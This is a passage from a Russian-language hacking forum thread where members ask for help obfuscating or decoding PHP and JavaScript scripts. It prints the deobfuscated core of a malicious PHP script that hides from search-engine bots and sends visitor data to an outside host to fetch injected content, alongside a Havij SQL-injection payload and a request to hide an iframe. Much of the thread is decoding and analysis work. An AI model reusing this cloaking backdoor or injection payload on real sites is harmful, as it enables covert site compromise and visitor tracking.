Обфускация кода (вопросы, просьбы зашифровать/расшифровать скрипт )

Discussion in 'PHP' started by Sharky, 29 Sep 2009.

  1. masolit

    masolit Member

    Joined:
    1 Dec 2010
    Messages:
    23
    Likes Received:
    20
    Reputations:
    0
    http://pastebin.com/MSAKb6eS

    я думаю разберешся
     
    #501 masolit, 23 Feb 2012
    Last edited: 23 Feb 2012
    1 person likes this.
  2. asvabaditelb

    asvabaditelb New Member

    Joined:
    16 Mar 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    расшифруйте плиз
    http://www.sendspace.com/file/vl2qko
     
  3. gl0w

    gl0w Member

    Joined:
    31 Dec 2011
    Messages:
    59
    Likes Received:
    21
    Reputations:
    5
    Как можно обфусцировать iframe не слишком замудренно? чтобы хотябы нельзя было через поиск его найти.
    Спасибо.
     
  4. GRRRL Power

    GRRRL Power Elder - Старейшина

    Joined:
    13 Jul 2010
    Messages:
    823
    Likes Received:
    185
    Reputations:
    84
    http://pastebin.com/aAL6Ji22
     
    2 people like this.
  5. bimbim

    bimbim New Member

    Joined:
    24 Sep 2010
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    cнифером получаю код от Havij
    Code:
    999999.9 /*!30000union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536*/--
    Берем например select unhex('31303235343830303536"'), это 1025480056.
    В чем прикол?
    По идее должно быть 1, и не 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536... а 1,2,3...

    Короче как правильно расшифровать Havij запросы не покупая лицуху =)
     
  6. Metho

    Metho New Member

    Joined:
    18 Nov 2011
    Messages:
    182
    Likes Received:
    2
    Reputations:
    0
    Здравствуйте. Это часть скрипта :
    document['writeln'](' <input name="answer" value="no" id="radio-5" type="radio"> ');
    document['writeln'](' <label for="radio-5">\u0424\u0443\u0442\u0431\u043E\u043B\u043A\u0438 \u0434\u043B\u044F \u0431\u0435\u0440\u0435\u043C\u0435\u043D\u043D\u044B\u0445 </label><br> ');

    Это надпись -
    \u0424\u0443\u0442\u0431\u043E\u043B\u043A\u0438 \u0434\u043B\u044F \u0431\u0435\u0440\u0435\u043C\u0435\u043D\u043D\u044B\u0445

    как самому кодировать буквы в такие циферобуквы? :)
    спасибо.
     
    #506 Metho, 3 Mar 2012
    Last edited: 4 Mar 2012
  7. #Wolf#

    #Wolf# Elder - Старейшина

    Joined:
    26 Mar 2008
    Messages:
    375
    Likes Received:
    166
    Reputations:
    16
    http://paste2.org/p/1925441
     
  8. nonamez

    nonamez Elder - Старейшина

    Joined:
    22 Jul 2007
    Messages:
    565
    Likes Received:
    265
    Reputations:
    17
    помогите расшифровать http://pastebin.com/MmWGq2HV
     
  9. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    http://pastebin.com/gv6PW5iA
     
  10. GRRRL Power

    GRRRL Power Elder - Старейшина

    Joined:
    13 Jul 2010
    Messages:
    823
    Likes Received:
    185
    Reputations:
    84
    Крайне нетривиально зашифровано, муторно. Кажется, вся суть скрипта в этом:
    PHP:
    $arr = array("Google""Slurp""MSNBot""ia_archiver""Yandex""Rambler");
    if((
    preg_match("/" implode("|"$arr) . "/i"$_SERVER["HTTP_USER_AGENT"])) or (isset($_COOKIE['stats'])))
    {}
    else
    {
      @
    setcookie('stats',md5('stats'),time()+10800);

      
    $result file_get_contents("http://f528764d624db129b32c21fbca0cb8d6.com/in.php?i=".$_SERVER['REMOTE_ADDR']."&b=".urlencode($_SERVER['HTTP_USER_AGENT'])."&h=".$_SERVER['HTTP_HOST']);

      if (
    strstr($result,'!go!'))
      {
        
    $result explode('!go!',$result);
        
    $result $result[1];
        echo 
    $result;
      }
    }
    (имена переменных заменил, потому что там был треш).
     
  11. tipagraf

    tipagraf New Member

    Joined:
    17 Feb 2012
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    тоже хотел бы научиться так кодировать есть какой онлайн сервис?

    я так понял что этот онлайн сервис должен делать такие вещи
    но чет прошу прощения не получается подскажите плиз а есть какой нить ман как этим пользоваться , а то чет на интуитивном уровне ну не как не получается... ((( Заранее Благодарен.
     
  12. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    http://forum.antichat.ru/thread320734.html
     
  13. tipagraf

    tipagraf New Member

    Joined:
    17 Feb 2012
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    :)


    Зы млиин сори невнимательно читал посты. :)
     
    #513 tipagraf, 5 Mar 2012
    Last edited: 5 Mar 2012
  14. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    Как привести скрипт к читаемому виду если он начинается с
    preg_replace(" тут куча всего не понятного
     
  15. Bazillik

    Bazillik New Member

    Joined:
    25 Sep 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    помогите декодировать eval(gzinflate(base64_decode(
    http://pastebin.com/rLhMLui2
     
  16. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    http://pastebin.ca/2134006
     
    _________________________
  17. Bazillik

    Bazillik New Member

    Joined:
    25 Sep 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Спасибо большое. А подскажи как декодировал?
    я понимаю что руками, но если можно подробнее.
     
  18. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    PHP:
    <?php
    $xor
    =78;

    $a gzinflate(base64_decode(...));

    if(
    preg_match('/d18e96="(.+)";\$s74t7r95i18n3/s'$a$m))
    {
        
    $data=$m[1];
    }

    $temp=$data;$size=strlen($temp);$result='';
    for(
    $i=0;$i<$size;$i++)$result .= chr(ord($temp[$i]) ^ $xor);
    echo 
    "<textarea>";
    echo(
    "?>".$result."<?");
     
    _________________________
  19. Metho

    Metho New Member

    Joined:
    18 Nov 2011
    Messages:
    182
    Likes Received:
    2
    Reputations:
    0
    http://pastebin.com/HhvcqD87

    помогите пожалуйста расшифровать php скриптик
     
  20. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    http://pastebin.com/iq3ZYSmr
     
    _________________________
    1 person likes this.